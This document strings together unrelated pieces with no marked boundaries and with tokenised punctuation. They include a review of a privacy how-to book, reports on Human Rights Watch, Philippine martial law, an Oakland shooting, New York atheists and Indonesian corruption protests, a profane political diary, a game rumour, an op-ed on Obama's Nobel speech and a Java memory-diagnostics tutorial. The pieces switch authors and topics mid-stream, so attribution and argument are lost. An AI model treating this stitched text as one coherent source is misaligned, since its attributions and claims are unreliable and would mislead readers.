But you probably were n’t aware that so many federal laws are “ impossibly broad and vague ’ that you were a “ criminal ’ several times over today , just for going to work , picking up your kids , and eating dinner .
Moreover , the concept of criminal intent has been largely removed from the law , so you can be imprisoned even if you had no idea what you were doing was against the law .
Under the English common law we inherited , a crime requires intent .
This protection is disappearing in the U.S. As Mr. Silverglate writes , “ Since the New Deal era , Congress has delegated to various administrative agencies the task of writing the regulations , ’ even as “ Congress has demonstrated a growing dysfunction in crafting legislation that can in fact be understood . ’
Prosecutors identify defendants to go after instead of finding a law that was broken and figuring out who did it .
Expect more such prosecutions as Washington adds regulations .
— Wall Street Journal
One of the most powerful solutions against the sorts of miscarriages of justice that land people like you in prison is privacy .
Privacy makes it much harder for an overzealous prosecutor to spin your perfectly innocent activities into “ crimes . ’
Not to mention it also provides protection against the more mundane threats of identity thieves , psychotic ex-spouses , and so on .
A few people figured out long ago that the federal government was n’t actually here to help , and one of them , “ Boston T. Party , ’ ( a pen name ) in 1996 wrote Bulletproof Privacy , now out of print .
The thin volume , most of which is now quite dated , provided a how - to manual with practical solutions for increasing your personal privacy .
Boston has since rewritten and expanded it , and the new book , One Nation , Under Surveillance , is three times the size , and has at least three times the practical solutions for protecting yourself .
( I met Boston at this year ’s New Hampshire Liberty Forum where he spoke on gun rights in the U.S. after the D.C. v. Heller case .
He graciously sent me a signed copy of One Nation , Under Surveillance for free .
Unfortunately it got buried under a huge stack of papers on my desk for several months and I only recently found it again . )
Privacy is an insurance policy against oppression .
Privacy allows a tyrannized citizenry to think independently , freely , and clearly .
( Imagine if book stores were regulated as gun stores ! )
To speak out , network , and organize against unruly government — all of this in perfect accord with your natural rights , and in tradition with our American history and Constitution .
We did not form the servile institution of government for the goal of limitless obedience to that servant .
Neither did the States federate themselves under the Constitution for the utter dissolution of their own autonomy and prerogatives .
. . .
A government which knows everything about its people is an unassailable government , for the people can no longer safely congregate nor precipitate .
In an Orwellian state in which all your communications , transactions , and associations are monitored / approved , from whence comes any possible readjustment — much less a successful revolution from it ? . . .
When privacy goes , the people have in a sense “ thrown away the key ’ to their shackles .
Think of your decreasing privacy as being measured for a tailored straightjacket .
What do you have to hide ?
Today , perhaps nothing .
Next year , maybe a lot depending on new information and revised priorities .
Privacy is a comprehensive insurance policy .
Keep up the premiums , even if you ’re not quite sure why .
I ’m not going to share much of the how - to with you .
That ’s in the book , which you should buy .
Now .
Or even months ago , and I ’m sorry this thing sat under a bunch of junk on my desk for so long .
I learned quite a few things I never knew , and refreshed myself on those I did .
The thing about many of the privacy techniques shown in the book is that in order to protect your privacy most effectively , they have to be in place already before you are threatened .
That means you — no matter how innocent you think you are — need to protect yourself .
Virtually everything imaginable is covered , most in great detail .
A few topics were not covered in detail , such as creating alternate identities , or trusts and financial instruments , since the information tends to go out of date rapidly , or would require their own books , or might be illegal to even talk about ( in the supposed land of the free ) .
So it is not a complete how - to , but it is nearly complete .
Most of the expanded content in this book deals with online privacy .
This was hardly an issue in 1996 when Bulletproof Privacy was published and almost nobody had even heard of the Internet ; today virtually everyone is online and too few people on the Internet do much of anything to protect their privacy .
Consider the fugitive who fled to Mexico and then updated his status on Facebook .
“ People just do n’t think through the privacy implications of putting their information on the Internet , ’ security expert Bruce Schneier wrote Monday .
“ Facebook is how we interact with friends , and we think of it in the frame of interacting with friends .
We do n’t think that our employers might be looking — they ’re not our friends ! — that the information will be around forever , or that it might be abused .
Privacy is n’t salient ; chatting with friends is . ’
The sections dealing with securing your computer and being private online are valuable content and the book is worth buying for this alone ; Boston covered pretty much everything , from e-mail to cookies to malware to encryption to government raids .
I did spot a few technical errors , but nothing that invalidated the techniques presented .
I do have a few minor nits to pick , though .
The first is that I do n’t feel enough attention was given to risk assessment .
Any security expert will tell you that knowing what risks you face , how likely they are to occur , and how disruptive they would be if they occurred , is critical information in determining what you need to do to protect yourself .
Boston assumes that his readers want as much privacy as possible , almost without regard to cost or inconvenience .
I would have liked to see more treatment of specific risks and how particular techniques mitigate those risks , as well as how to assess risk generally .
This , I think , would make the book more accessible and more useful to a wider audience .
Second , I will have to share one of Boston ’s techniques .
He recommends using Puppy Linux , a stripped down operating system distribution which can run from a CD or USB stick , instead of having your operating system installed on your hard drive .
Puppy Linux can also encrypt your data and save it back to the same USB stick , which he recommends .
This is probably workable for some people , and is practically necessary when using a public computer ( since they ca n’t be trusted ) but other people will be entirely unable to do this , myself included .
His advice to never , ever use Windows for anything is sound , of course .
But I do many things which pretty much require an installed operating system , such as video editing .
For people who ca n’t live off a USB stick , I would recommend you install Ubuntu or Fedora , both of which are much more full - featured and also offer simple full - disk encryption for your hard drive which is stronger than that provided in Puppy Linux .
( I helped test the full - disk encryption feature in Fedora and contributed a few small bits of code to it . )
Finally , with the rapid changes in technology , and the relentless encroachment of government into every aspect of people ’s lives , doubtless much of the information in One Nation , Under Surveillance will be out of date , useless , or even potentially dangerous soon .
I would like to see some sort of web site to serve as an online addendum to the book , which could contain errata , new information , perhaps a wiki , etc .
Many books , especially dealing with technical topics , have such sites already and they serve to add further value .
One Nation , Under Surveillance should be on the bookshelf of anyone serious about privacy , both online and offline .
If you are n’t sure , but you think you might need some privacy in the future , you should use it to get started now .
By the time you ’re sure you need privacy , it may be too late .
And if you ’ll excuse me , I need to clean my desk .
America 's leading human rights organisation has accused Israel and its supporters of an " organised campaign " of false allegations and misinformation , including " extremely personal attacks " on its staff , in an attempt to discredit the group over its reports of war crimes in Gaza .
Human Rights Watch ( HRW ) ties the campaign – which has included accusations that the group 's reports on the Jewish state are written by " anti-Israel ideologues " and that it has sought funds from Saudi Arabia – to a statement by a senior official in the Israeli prime minister 's office in June pledging to " dedicate time and manpower to combating " human rights organisations .
The criticism began with Israeli pressure groups and rightwing blogs , but in recent weeks it has drawn the support of influential individuals such as Elie Wiesel , the Holocaust survivor and Nobel peace prize winner , and HRW 's own founder , Robert Bernstein , who said the organisation 's reports were " helping those who wish to turn Israel into a pariah state " .
He called on HRW to focus more on abuses by Arab governments .
Iain Levine , HRW 's programme director , said that while the organisation had long attracted criticism , in recent months there had been significant attempts to intimidate and discredit it .
" I really hesitate to use words like conspiracy , but there is a feeling that there is an organised campaign , and we 're seeing from different places what would appear to be co-ordinated attacks ... from some of the language and arguments used it would seem as if there has been discussion , " he said .
" We are having to spend a lot of time repudiating the lies , the falsehoods , the misinformation . "
Spearheading some of the criticism is NGO Monitor in Jerusalem , an Israeli group funded by wealthy US donors which includes Wiesel on its advisory board .
It has accused HRW staff of having a " political agenda " to attack Israel .
Criticism has particularly focused on the director of HRW 's Middle East division , Sarah Leah Whitson , over a visit to Saudi Arabia .
NGO Monitor accused Whitson of attempting to raise money from Saudi officials by highlighting HRW 's criticism of Israel , a charge also made in a comment piece for the Wall Street Journal online that was subsequently widely distributed by the most powerful of the pro-Israel lobby groups , the American Israel Public Affairs Committee ( Aipac ) .
Shortly afterwards , the director of policy planning in the Israeli prime minister 's office , Ron Dermer , denounced Human Rights Watch .
" We are going to dedicate time and manpower to combating these groups ; we are not going to be sitting ducks in a pond for the human rights groups to shoot at us with impunity , " he said .
Levine said that Whitson 's visit to Saudi Arabia was similar to trips by other HRW officials to Tokyo , Johannesburg and Tel Aviv to win the support of individuals interested in supporting human rights in their own countries and abroad .
" This idea that somehow the Saudi government is going to be able to influence us is nonsense .
It 's a cardinal principle of the organisation that we do n't take government money , " he said .
But Levine added that Dermer 's threat marked the escalation of the campaign against HRW .
" It was clear that you had a new government in Israel under Binyamin Netanyahu with a harder right approach .
He certainly recognised that the criticisms of Israeli conduct in Gaza from a humanitarian law perspective was extremely politically damaging , " he said .
Levine said he believes many of the attacks were aimed at distracting attention from the report of the UN investigator , Richard Goldstone , which was highly critical of Israel 's killing of civilians in its three - week attack on Gaza that started last December .
Goldstone is a former member of the HRW board and the group has strongly backed his report .
" We have been under enormous pressure and tremendous attacks , some of them very personal , as have been the attacks against Richard Goldstone with really vituperative language used to describe him : obsequious Jew , self - loathing Jew and all the rest of it , " said Levine .
HRW came under renewed criticism last month from its founder , Robert Bernstein , in an opinion article in the New York Times in which he accused it of criticising Israel more than undemocratic governments in the rest of the Middle East .
" Human Rights Watch has lost critical perspective on a conflict in which Israel has been repeatedly attacked by Hamas and Hezbollah , organisations that go after Israeli citizens and use their own people as human shields , " he wrote .
Bernstein accused HRW of basing its accusations against Israel on the testimony of Palestinian " witnesses whose stories cannot be verified and who may testify for political advantage or because they fear retaliation from their own rulers " .
Levine said that Bernstein went public only after the HRW board rejected his call for a change in direction .
A few days later , Wiesel and others published a letter in the Guardian drawing attention to Bernstein 's article , accusing HRW of playing a " destructive role " and calling for a review by the organisation 's board .
In September , HRW was shaken by accusations that its military expert and collector of war memorabilia , Marc Garlasco , is a Nazi sympathiser after describing an SS jacket as " so cool " in comments on a blog .
Both he and HRW vigorously deny the charge , but Garlasco has been suspended pending an investigation .
At the time , Levine called the attacks on Garlasco the latest salvo in the Israeli government 's campaign " to eliminate the space for legitimate criticism " of the Israeli military .
I find it laughable that , in this day and age of huge corporate donations and well - organized conservative political PACs , anyone thinks Obama could have " pulled an LBJ " and strong - armed Republicans and recalcitrant Democrats into submission .
That 's just not realistic .
There is nothing that the administration could offer these people that would stack up against the giant piles of money corporations and PACs funnel into their election coffers .
And there 's nothing they could offer that would give them any more power , notoriety or " fame " than they get from the grandstanding they are performing right now .
Nothing .
This is a different world than existed in LBJ 's day .
Besides the more intense impact of corporate funding and PAC money , the filibuster is used today in ways it never was back then .
And it 's probably worth reminding folks that Obama got elected because he promised to change the way politics is done in Washington .
That 's a big part of the reason people like me voted for him .
He was different .
He actually gave us some hope that he might actually be able to bring disparate groups together to solve America 's problem .
So when Joe Fucking Lieberman pulls his shit and does his self - serving , narcissistic craptastic dance to attract attention to himself , it 's disingenuous to suggest that somehow the president could have changed that .
He could n't .
Lieberman is a fuck now and would have been a fuck no matter what Obama and Axelrod and Emmanuel and Reid did .
Period .
That 's what Lieberman does .
You want to blame someone ?
Blame the voters of Connecticut .
That 's a good place to start .
Kossacks tried to tell them different , that 's for sure .
This is not Barack Obama 's failure .
It 's Joe Lieberman 's failure .
It 's Ben Nelson 's failure .
It 's Mary Landrieu 's failure .
It 's Bart Stupak 's failure .
It 's the Republican 's failure .
Nothing Obama and Co. could have done would have changed the way these douchenozzles acted .
If he had threatened to veto any legislation that did n't include [ fill in the blank ] , they would have said , " Fine .
Status quo works for me . "
And then we'd be no further ahead than we were last year .
Or the year before that .
Or the decade before that .
Or ...
About the only fault you could place at their doorstep , in my opinion , is the decision last spring to let Lieberman into the fold and to give him any kind of leadership position .
While that argument at least holds some weight , I doubt that most people knew at the time what an incredible fuckwad he'd turn out to be .
And , even if they did know , does anyone think Lieberman would have behaved differently if they had n't allowed him into the fold ?
He 's still a Senator that was a " swing vote " and his leadership position does n't play into that .
He still would have been able to do all the douchey obstructionist horseshit he 's doing today .
How could he have voted or behaved differently that would be any worse than what he 's doing now ???
God help us if we do n't extract some good out of this reform .
Thanks primarily to Democrats ( ugh ! ) , there will be Democratic blood on the floor in 2010 if we do n't .
But , in the final analysis , making President Obama the scapegoat does n't address the core issues that have us where we are today : Corporate influence on campaigns , grandstanding conservatives determined to hijack any issue they can in order to draw power to themselves , and the lack of truly progressive members of Congress .
If we want to change this country in the progressive direction , those are the areas where we should be focusing our attention .
Not on making Barack Obama our scapegoat .
I 'm just sayin ' ...
=-=-=-=-=-=-=-=-=-=-=
UPDATE :
There are looo - oooots of people claiming in the comments that this is some sort of Obamabot defense of Barack Obama .
It 's not and any careful reading of it should make that obvious .
He neither needs nor would seek that .
Rather , this is a diary about making sure that we are focusing on the root cause of the problems we 're facing right now , problems I outlined in the diary .
When I say " there 's not one thing that President Obama could have done would have changed any of this " , that 's an opinion .
Obviously .
Maybe you think he could have jaw - boned Nelson and Stupak and Lieberman .
Maybe you think he could have beat them about the head and shoulders ( politically - speaking ) and they would have gotten in line .
Maybe you think he could have been more outspoken about the public option and by some miracle , the magic of his oratory would have convinced this small handful of recalcitrant Conservadems and Joe Lieberman ( and maybe even a Republican or two ) to back his legislative goals .
I disagree and I think it 's unrealistic to believe otherwise .
What I believe is that we need to be fighting for campaign finance reform to remove corporate cash from the equation and to be fighting for filling Congress with more progressive members .
Blaming Obama for this debacle does neither of those things and it is tilting at the wrong windmill .
Casting director Chris Marazzo has confirmed to Battlefront 3.net that he has been working closely with Lucasarts on not only Battlefront 3 , but the 2006 release of Star Wars Empire at War : Forces of Corruption .
Rumors started circulating this week regarding the project , so BF3 . net contacted Marazzo and received this reply :
“ Thanks for getting in touch .
The Original Title was Battlefront 3 but it evolved into Star Wars Empire at War : Forces of Corruption .
However Battlefront 3 is also in development .
It was by far the most fun and coolest casting I ever worked on . ”
Marazzo also told the site that he would try and send over some Battlefront 3 storyboards “ by the end of the week ” .
If you look at his portfolio , it states that he has “ cast over 200 Commercials and various projects in NY and LA , including most recently STAR WARS : Battlefront 3 with Lucas Arts ” .
Hit the links for more .
Meanwhile , we ’ll contact Lucasarts and see what it has to say about all of this .
Opportunity Lost : Obama in Oslo Editor ’s Note :
In his Nobel Peace Prize acceptance speech in Oslo , President Barack Obama downplayed the bloodshed caused by scores of U.S. military interventions and covert operations over the past six decades – and sought to justify his own escalation of the eight - year - old war in Afghanistan .
In this guest essay , Daniel C. Maguire , a Professor of Ethics at Marquette University , found Obama ’s effort disappointing and disingenuous : Whether Obama deserved the Nobel Peace Prize is not the point .
He did n’t .
The fact is he got it , and was gifted with the chance of a lifetime to make a classic speech on the politics of peace - making , a speech that in the glare of Nobel could have attained instant biblical standing .
Email
Printer friendly
He failed miserably , producing a hodge - podge that resembled the work of a bright but undisciplined sophomore .
He hoisted his petard on the classical " just war theory , " a theory that , properly understood , condemns his decision to send yet more kill - power into Afghanistan .
This theory which is much misused and little understood is designed to build a wall of assumptions against state - sponsored violence , i.e. war .
It puts the burden of proof on the warrior where it belongs .
It gives six conditions necessary to justify a war .
Fail one , and the war is immoral .
The six are : ( 1 ) A just cause .
The only just cause is defense against an attack , not a preemptive attack on those who might someday attack us .
Obama flunked this one , saying our current military actions are " to defend ourselves and all nations from further [ i.e. future ] attacks . "
President Bush speaks here through the mouth of President Obama .
( 2 ) Declaration by competent authority : Article one Section 8 of the Constitution which gives this power to the Congress has not been used since 1941 .
Congressional resolutions instead yield the power to the President .
Obama : " I am responsible for the deployment of thousands of young Americans to battle in a distant land . "
Sorry .
Not according to the Constitution .
On top of that we are bound by treaty to the United Nations Charter .
Article 2 , Section 4 prohibits recourse to military force except in circumstances of self - defense which was restricted to responses to a prior " armed attack " ( Article 51 ) , and only then until the Security Council had the chance to review the claim .
Obama fails twice on proper declaration of war .
He violates the UN Charter by claiming the right to act " unilaterally " and " individually . "
Again , faithful echoes of President Bush .
( 3 ) Right intention :
This means that there is reasonable surety that the war will succeed in serving justice and making a way to real peace .
Right intention is befouled by excessive secrecy , by putting the burdens of the war on the poor or future generations , by denying the right to conscientious object to soldiers who happen to know most of what is going on , and by a failure to understand the enemy ’s grievances .
Obama declares gratuitously : " Negotiations cannot convince al Qaeda ’s leaders to lay down their arms . "
So all we can do is send soldiers to kill them ?
Really ?
What negotiations have been tried to find out why they hate us and not Sweden , or Argentina , or China ?
A pause for reflection might show that those and other countries are not bombing and killing civilians in three Muslim countries simultaneously .
That could generate a little resentment .
None of those countries not targeted by al Qaeda are financing Israel ’s illegal occupation of Palestinian lands in violation of UN resolutions .
The processes of negotiation allow light to shine in dark corners .
Realpolitik eschews the light .
( 4 ) The principle of discrimination , or non-combatant immunity .
The science of war has made this condition so unachievable that only the policing paradigm envisioned by the UN Charter could ever justify state - sponsored violence .
Police operate within the constraints of law , as a communitarian effort , with oversight and follow - up review to prevent undue violence .
Obama ’s allusion to “ 42 other countries ” joining in our violent work in Afghanistan and Iraq mocks the true intent of the collective action envisioned by the UN under supervision of the Security Council .
It is a mere disguise for our vigilante adventurism .
( 5 ) Last resort .
If state - sponsored violence is not the last resort we stand morally with hoodlums who would solve problems by murder .
Obama fails to see that modern warfare , including counterinsurgency , is not the last or best resort against an enemy that has four unmatchable advantages : invisibility , versatility , patience , and the ability to find safe haven anywhere .
The idea of a single geographic safe haven is a myth and an anachronism reflecting the age of whole armies mobilizing in a definable locus .
Obama ’s speech showed no appreciation of the alternative of peace - making .
A Department of Peace ( which would be a better name for a revitalized and better - funded State Department ) would have as its goal to address in concert with other nations tensions as they begin to build .
Neglected crises can explode eventually into violence .
This is used to assert the inevitability of war when it is only an indictment of improvident statecraft .
( 6 ) The principle of proportionality :
Put simply , the violence of war must do more good than harm .
In judging war the impact on other nations and the environment must also be assessed in the balance sheet of good and bad results .
This is a hard test for modern warriors to pass .
Victory in war is an oxymoron .
No one wins a war : one side may lose less and may spin that as victory .
Obama ’s faith in the benefits of warring in three Muslim countries is delusional .
President Obama in Oslo was more a theologian than a statesman .
He gave a condescending nod to nonviolent power but his theology of original sin tilted him toward violence as the surest and final arbiter for a fallen humanity .
It is “ a pity beyond all telling ” that the “ just war theory ” he invoked condemns the warring policies he anomalously defended as he accepted the Nobel Prize for Peace .
Daniel C. Maguire , a Professor of Moral Theological Ethics at Marquette University , is the author of The Horrors We Bless : Rethinking the Just - War Legacy .
To comment at Consortiumblog , click here .
( To make a blog comment about this or other stories , you can use your normal e-mail address and password .
Ignore the prompt for a Google account . )
To comment to us by e-mail , click here .
To donate so we can continue reporting and publishing stories like the one you just read , click here .
Back to Home Page
You think that your shiny Java app has some memory issues but how do you find out if that is true and what is taking up all that memory ?
Knowing the potential problems is fine .
Nevertheless you still have to find out your actual problems .
There are several instruments available to help you analyse your Java application regarding its memory usage .
I will tell you about increasing your maximum heap ( most of you surely know about that ) , looking at the memory of a running app , making heap dumps ( on demand or on OutOfMemoryException ) and analyzing the dumps .
Increasing maximum heap
The Java VM has a setting that defines the maximum amount of heap memory available to your application .
It defaults to 64MB which is enough for many programs .
If you have a larger application you should try to start it with that value increased by passing the - Xmx < size >m parameter to the VM at startup .
< size > is the value in MBytes so just fiddle around with that .
If your app is leaking memory that wo n’t help you for long so you have to find out * if * it leaks .
Looking at memory usage of a running application
You can use jconsole for a quick look at your applications resource usage .
jconsole is part of the Sun JDK since Java 6 .
You can connect the jconsole to any running java applications on your computer or even reachable over network and offering the Java Management Extensions ( JMX ) over TCP .
Non-leaking programs should have a memory graph like this :
You can see , that the memory fluctuates over time because of the garbage collection cycles .
But overall it does not grow .
Next we will look at an application that leaks memory :
Above we see that the garbage collector ( GC ) tries its best but the used memory is growing over time .
If we see such behaviour we probably need a heap dump to analyze the issue further .
Making a heapdump
Basically you have two nice ways to get a heap dump of your application which you can look into at a later time :
Use jmap ( which is also part of the Sun JDK 6 ) to dump the heap of a running application to a file using a command line like jmap - dump: format=b , file=myheap.hprof < pid >
Tell the VM to make a heap dump when an OutOfMemoryException occurs by adding - XX : +HeapDumpOnOutOfMemoryError to the VM parameters at startup .
With another switch you can specify the path for the dumps : -XX:HeapDumpPath=jmxdata .
After you have obtained a dump of your application you certainly want to have a look at it and find the issues .
You can start with Sun ’s jhat which is also part of current JDKs .
After supplying jhat the hprof - file you can point your browser to the integrated webserver of jhat and browse the heap looking for the objects that take up your memory .
That way you can get an idea of what objects lived in memory when the heap dump was made and how they were referenced .
Conclusion
We have seen many ways to perform memory diagnostics using only free tools which are part of the JDK from Sun .
They are all nice but have their limitations .
Especially jhat has problems with usability and performance when you examine larger heap dumps with it .
Next time I will show you how to use the Eclipse plugin MAT for analysis of heap dumps obtained in one of the above ways .
So stay tuned !
The Philippines on Saturday announced the imposition of martial law in a southern province to quell a rebellion by a powerful clan accused of being behind the massacre of 57 people .
President Gloria Arroyo placed Maguindanao province under military control late on Friday in an effort to contain heavily - armed militias belonging to the provincial governor and other members of his Muslim clan , authorities said .
ADVERTISEMENT
“ There ’s a rebellion in the area , ” Justice Secretary Agnes Devanadera said .
“ It was practically an overthrow of government . ”
Arroyo ’s controversial move is the first time martial law has been declared in the Philippines since the reign of dictator Ferdinand Marcos , who had the whole of the country under martial law from 1972 to 1981 .
Authorities insisted martial law was necessary to rein in swarms of heavily armed gunmen loyal to the Ampatuan clan who had threatened violence if their leaders were taken into custody .
Related article : Farmers flee over fears of violence
Within hours of the declaration , special forces detained the province ’s governor and clan patriarch , Andal Ampatuan Snr , who had ruled Maguindanao since 2001 with Arroyo ’s support and the backing of a private army .
More than 4,000 government soldiers were deployed in Shariff Aguak , the provincial capital , and other Ampatuan strongholds , the military said .
ADVERTISEMENT
By nightfall on Saturday , 32 people had been taken into custody , including five members of the Ampatuan family and 20 of their militiamen , national police chief Director General Jesus Verzosa told reporters in Manila .
The militiamen were arrested in a raid on an Ampatuan warehouse that also netted 340,000 rounds of ammunition for M16 assault rifles , Verzosa said .
But he warned that the many gunmen not yet rounded up were likely to fight back .
ADVERTISEMENT
“ So far , there has been no firefight but we expect there will be an engagement because they are armed , ” he said .
Andal Ampatuan Jnr , a son of the patriarch , is already in a Manila detention centre after being charged with 25 counts of murder for the November 23 massacre that took place in a farming area near Shariff Aguak town .
ADVERTISEMENT
Police allege he and 100 of his men shot dead the occupants of a convoy that included relatives of his rival for the post of governor in next year ’s elections , as well as a group of journalists .
The rival , Esmael Mangudadatu , said the killings were carried out to stop him running for office .
The military said one of the triggers for martial law was the discovery on Thursday of a huge cache of weapons buried a few hundred metres ( yards ) from the family ’s compound in Shariff Aguak .
ADVERTISEMENT
The cache included three anti-tank recoilless rifles , mortars , machine guns , rifles and pistols , and thousands of rounds of ammunition — enough to arm two battalions or about 1,000 soldiers .
Devanadera said local governments had stopped functioning as a result of efforts by forces loyal to the Ampatuans to foment rebellion .
But Arroyo ’s critics said martial law was not justified and might be unconstitutional .
They also warned it might be a prelude to her seizing similar control of other parts of the country or even part of a bid to remain in power after the constitution requires her to step down next June .
ADVERTISEMENT
“ We believe there ’s no basis for the implementation of martial law , ” said opposition Senator Benigno Aquino , the front - runner in next year ’s presidential elections .
Muslim rebels fighting for an independent homeland have been waging a rebellion on Maguindanao and other parts of Mindanao island since the late 1970s .
The conflict has claimed more than 150,000 lives , the military says .
Arroyo ’s government has used Muslim clans such as the Ampatuans to rule these areas , and allowed them to build up their own armies as part of a controversial containment strategy against the insurgents .
Andal Ampatuan Snr and Jnr were members of Arroyo ’s ruling coalition until last week .
New York City Atheists photo
¿ Cómo se dice “ atheism ” en español ?
New York City Atheists , New York ’s chapter of American Atheists , wants to pose that question ( the answer is ateísmo ) in meetings aimed at the city ’s Spanish - speaking population .
Conducting meetings in Spanish is the organization ’s latest attempt to expand and garner publicity .
The new meetings follow a campaign of advertising on city buses last July and television shows that run four times a week on the Manhattan Neighborhood Network , a public - access cable network .
( The well - publicized atheist advertisements that appeared in subway stations in October were the work of an unrelated coalition of local groups that called itself the Big Apple Coalition of Reason in the advertisements . )
Ken Bronstein , the president of New York City Atheists , said he started the meetings because Spanish - speaking atheists asked for them .
Mr. Bronstein said he believed that Spanish speakers were receptive to an atheistic message despite their roots in Roman Catholicism and the growing hold of evangelical Protestantism .
He said many of the people who attended the first two meetings , on Oct. 27 and Nov. 24 , became disillusioned when their prayers did not help their home countries .
“ Their prayers were n’t answered — they did n’t like organized religion , ” Mr. Bronstein said .
“ A lot of them were turned off because the lack of progress , the lack of economic progress in their countries , the combination of the church and the state holding them back . ”
Mr. Bronstein said that the meetings were still relatively small , with about 15 members attending , but that there were around 50 people on an e-mail list .
“ We ’re going to bust out pretty quickly in attendance , ” Mr. Bronstein said .
“ We think there ’s a major group of nonbelievers , atheists , in this community . ”
Mr. Bronstein , who does not speak Spanish , said the meetings were directed by Juan Castro , an atheist from the Dominican Republic and the author of “ Una Cruzada por la Humanidad , ” or “ A Crusade for Humanity , ” a book that critically examines the world ’s religions in Spanish .
Mr. Castro said he became an outspoken atheist about seven years ago .
Although he was raised Catholic , he has never been observant .
“ But I was from a family like everyone in my country who was Christian , ” he said .
“ I always have my own thing , but I was quiet about it . ”
Mr. Castro plans to expand the group through advertising in Spanish - language publications and television .
Christians in the area have not seemed too concerned , so far , by the atheists ’ new outreach .
The Rev. Lorenzo Ato , assistant director for Hispanic media at the Roman Catholic Archdiocese of New York and the host of two Catholic - themed radio shows in Spanish , said atheism was rare among the Hispanic population .
“ I do not believe atheism is widespread in the Spanish - speaking community in the city , ” Father Ato wrote in an e-mail message .
“ I have not experienced any Hispanic within the city stating they are losing their faith in God or announce to me that they are atheists . ”
Father Ato was unconcerned that the atheist group was concentrating on Spanish - speakers .
“ I do not believe this group is problematic because , first , those who believe in God and those who do not believe in God can live in the same city without difficulty , ” Father Ato explained .
“ Since the beginning of time , atheists have been in existence , and the teachings of the church is to pray for them , respect them and live in peace , because we share the same dignity and the same esteem for humanity . ”
Father
Ato added that he thought the group might even partner with the church in doing good works .
“ I feel we can work together and provide a partnership in order to improve society , ” Father Ato wrote .
Mr. Castro just wants to make sure that Spanish speakers in New York consider his point of view .
“ I ’m trying to open the eyes , ” Mr. Castro said .
A wild evening of shootings in East Oakland that began in a drugstore parking lot , spilled onto Interstate 580 and ended up in an apartment complex left one man shot dead by a police officer and two others wounded , authorities said .
The dead man , 18 - year - old Kenneth Ross of Oakland , was killed when he allegedly pulled his gun on police as they tried to question him in the stairwell of an apartment complex at 2701 64th Ave. , police said .
His companion , Jarone Castle , 19 , of Vallejo , was wounded , possibly by gunfire , and arrested on suspicion of involvement in the earlier parking lot shooting , police said .
Investigators said they believe the pair and as many as four other men with them were members of the 211 Gang - named for the 211 penal code for " robbery " - which is suspected of a string of holdups in Oakland , Merced and Modesto .
Police are still hunting for as many as a half - dozen men involved in the evening 's fracases .
" There are still some very violent people out there , and we need to find them , " police spokesman Officer Jeff Thomason said .
Sources identified the officers who fired their weapons as Anthony Tedesco and Kevin Kaney , who is a firearms expert for the department .
Ross had a conviction record for armed robbery and gun crimes , Thomason said .
Castle has prior convictions for drugs and resisting arrest .
Thursday 's shooting was the sixth involving Oakland police this year , Thomason said .
Last year there were 11 .
The incident is under investigation by police homicide and internal affairs and the Alameda County district attorney 's office .
Any officers who fired their weapons will be placed on paid administrative leave , which is standard procedure .
The clashes began at 4:56 p.m. when Ross , Castle and their companions in a maroon van got involved in either a shootout or a drive - by shooting with a blue sedan in the parking lot of a Walgreens drugstore on 33rd Avenue , police said .
After the flurry of shots there , the van sped off to I - 580 , where it rammed a car about 5:10 p.m. near the Edwards Street exit .
The occupants of the car were not badly hurt .
While the van was stopped , the blue sedan pulled up and some men jumped out , police said .
The sedan 's occupants dragged a man from the van , shot him and pistol - whipped him , police said .
The attackers then fled , and a bystander took the man to Highland Hospital .
The victim , whom police have not named , was later arrested for possible involvement in the Walgreens shooting .
He is expected to recover , Thomason said .
The men remaining in the van then drove to the apartment block on 64th Avenue , where a resident called police after seeing at least one emerge with a rifle .
Investigators raced to the scene , and after several officers tried to stop Ross and Castle in the stairwell , Ross was shot dead about 5:40 p.m. , police said .
Ross and Castle were both carrying .45 - caliber
Glock semiautomatic pistols , police said .
Officers also recovered an assault rifle and a pistol - grip shotgun from the van .
" There was just an absolute disregard of the public in these incidents , " Deputy Chief Jeffrey Israel said .
" There was apparently no fear by these shooters for the people nearby or for the witnesses , and there were plenty of witnesses . "
December 9 , 2009 --
The great photos above are of a mass demonstration in Jakarta on International Anti-corruption Day December 9 , 2009 , just one of many demonstrations against corruption have been sweeping Indonesia protesting allegations that a US $ 600 million government bailout was given to Century Bank on condition that some of the money be used to fund President Yudhoyono 's re-election campaign .
Links International Journal of Socialist Renewal and Green Left Weekly 's Peter Boyle asked Dominggus Oktavanius , a leader of the Peoples Democratic Party ( PRD ) , about this latest wave of demonstations .
How big are the demonstrations ?
And in which cities have there been protests ?
What political forces have organised these protests ?
Dominggus :
Tens of thousands of people were marching down the streets of Jakarta and Makasar .
Other smaller demonstrations took place all over Indonesia .
These demonstrations involved students and youngsters , besides of course the PRD and mass organisations ( labour and poor people ) .
A wide range of political groups were involved in organising these protest .
They range from across the political spectrum , socialist , nationalist to religious .
Of course there are different perspectives represented by these political forces , but we see a common enthusiasm to unite to fight against corruption .
We hope that this common entusiasm will prove to be infectious because the eradication of corruption can only be effective if it involves organised mass participation .
What is the evidence for these allegations about Yudhoyono 's role in the Centruy Bank scandal ?
The government 's Emergency Regulation ( Perpu ) No.4 of 2008 about a safety net for the financial system was signed by Yudhoyono .
According to constitution , emergency regulations are only allowed to be made by the government in a state of emergency and with the House of Representatives ’ approval .
At that time , the state of emergency was being questioned , and the House of Representatives did n’t give its approval , yet the emergency regulation was imposed by the executive to give giving 6.7 trillion rupiahs to bailout the Century Bank .
Article 29 of the Emergency Regulation exempted that minister of finance Sri Mulyani , Indonesian Bank ’s governor Boediono and “ everyone who carries the duty ” from any punishment .
This means that Yudhoyono gave the power and protection for criminal actions by government officials and everyone involved in the scandal .
So , Yudhoyono has violated the constitution .
This Century Bank scandal follows the arrests of two members of the Corruption Eradication Commission ( KPK ) , which was popularly seen as attempt by the police and attorney general 's office to cripple a commission that has prosecuted around 150 high - level politicians and law enforcement officials since its formation in 2003 .
Has Yudhoyono taken any serious action against this outrage ?
The government 's corruption became even clearer to the people when Yudhoyono attempted to weaken the KPK by planning to arrest several of its leading officials .
It ’s clear that Yudhoyono was attempting to obstruct KPK ’s effort to investigate the Century Bank scandal .
People ’s distrust of the Yudhoyono government is increasing because of his delay in arresting corrupt conglomerates , police and attorney general office officials .
They , based on telephone records , have conspired to weaken the KPK .
Yudhoyono has often claimed to be in the frontline of corruption eradication , but when corruption felonies take place right before his eyes , he lets the perpetrators go free .
It makes people wonder what is going on .
Of course , the KPK as an institution that is part of a corrupt system cannot be assured of being totally clean .
Nevertheless , since it was formed in 2003 , its achievements in cracking down on corrupt officials ( which are actually still selective ) has given many people people high hopes in this institution .
